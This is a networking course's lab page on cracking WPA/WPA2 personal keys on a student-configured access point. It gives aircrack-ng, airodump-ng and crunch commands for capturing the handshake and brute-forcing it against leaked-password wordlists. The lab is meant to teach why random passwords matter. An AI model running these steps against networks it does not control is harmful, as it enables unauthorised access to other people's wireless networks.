WPA Cracking

From csn
Jump to navigation Jump to search

In this lab, we will demonstrate the vulnerabilities with WPA. These vulnerabilities are evident in both WPA (TKIP) and WPA2 (CCMP) modes. It is hoped that it will provide you with:

  • An accurate idea of the vulnerabilities in WPA
  • A good idea of how to securely implement WPA


Configure WPA

Our first task is to configure WPA over the wireless network. Ensure that the wireless Windows PC can Ping the Wired PC. Refer to Basic AP Configuration if you need to. Please ensure that you keep the username as root and the password as admin. Use the WPA password: charlie12. Unlike the previous WEP cracking lab where we could pick any hex key, we must use a simple predictable password. When cracking WEP we were identifying the key based on a series of statistical attacks. Use WPA2 Personal and TKIP+AES.

Ensure that the wireless Windows PC can Ping the Wired PC. Refer to Basic AP Configuration if you need to. Additionally, turn off the 5GHz radio and change the network mode on the 2.4 GHz radio to 802.11b/g only.

In this WPA cracking lab, we are brute-forcing the key. We are only able to identify the key if it is part of our password database. The more complex the key, the less likely it will appear in a password database. An alternative way of looking at this, the longer and more complex the key, the longer and more complex our password database must be. This will also increase the amount of computation required to break the key.

Basic lab setup
Basic lab setup

Aircrack and monitor mode

Follow the instructions here to put the Alpha USB Wifi adapter in monitor mode: Alpha_USB_in_monitor_mode

Discover Network

We need to discover the channel and BSSID of our target network. Start Wireshark with:

sudo wireshark

Put the interface in monitor mode and use wireshark to discover the bssid of the target. Copy this value to a text file for later.

Collecting the handshake in Wireshark

Try capturing the encrypted handshake in wireshark. packets? Save the pcap on the Desktop.

Using Aerodump

Another alternative is using airodump. Type:

sudo iwconfig [interface_name] channel [x]

Collecting the authentication handshake with airodump-ng

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the target AP. Enter:

sudo airodump-ng -c [the_channel] --bssid [the_BSSID] -w psk [interface_name]

On your legitimately connected wireless machine, try disconnecting and reconnecting a few times.

Crack the PSK

We are going to compare the four-way authentication handshake and compare it with a password list. Download a password list from the Internet.

Note, if Kali Linux drops its LAN connection, you can bring it up with a:

 sudo dhclient eth0

You can download a password list with:

wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt

AND

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-1000000.txt

For a larger list you can try:

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

The password list is generated from lists of leaked passwords. This list contains the most frequently used passwords. Some of the passwords in the list are offensive, please don't go looking if you are easily offended. If you ever discover your personal passwords in one of these password lists then you must change it immediately!

Crack the key with the following command:

aircrack-ng filename_of_packets -w [full_path_of_password.list]

Challenge

Ok, so what if the wordlist don't contain the password because the password isn't in the word list. Lets go to the other extreme and generate our own wordlist. Lets install crunch, a word list generator.

sudo apt install crunch

Ok now lets investigate how this works. Try:

crunch 3 4 0123456789

This command will generate passwords between 3 and 4 chars long with only numbers 0-9 and output to the screen. How would we put this in a file? Easy, try:

crunch 3 4 0123456789 > wordlist

Do an

ls -lah wordlist

How big is the file? Ok so now lets include the lowercase alphabet as well.

crunch 3 4 0123456789abcdefghijklmnopqrstuvwxyz > wordlist

How big is the file? Ok so now lets include the uppercase alphabet, still no special characters.

crunch 3 4 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ > wordlist

How big is the file? Hmmmm I still have a pretty reasonable 72 MB. Lets try increasing the size of the password to between 4 and 5:

crunch 4 5 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ > wordlist

Ok so, a much bigger 5GB. Did you know that you can't actually set a password in WPA less than 8 characters? Ok, lets try that. Lets just generate random 8 character passwords.

crunch 8 8 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ > wordlist

So I had a whopping 1787 TB! Yes, that is over 1 PB, PetaByte. I hope you can see the value in truly random passwords now! If you were going to do this, and you would need some serious hardware at your disposal, you would pipe the output of crunch into aircrack. Have a go at modifying the example below:

crunch 8 8 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | aircrack-ng -e dd-wrt -w - psk-0*.cap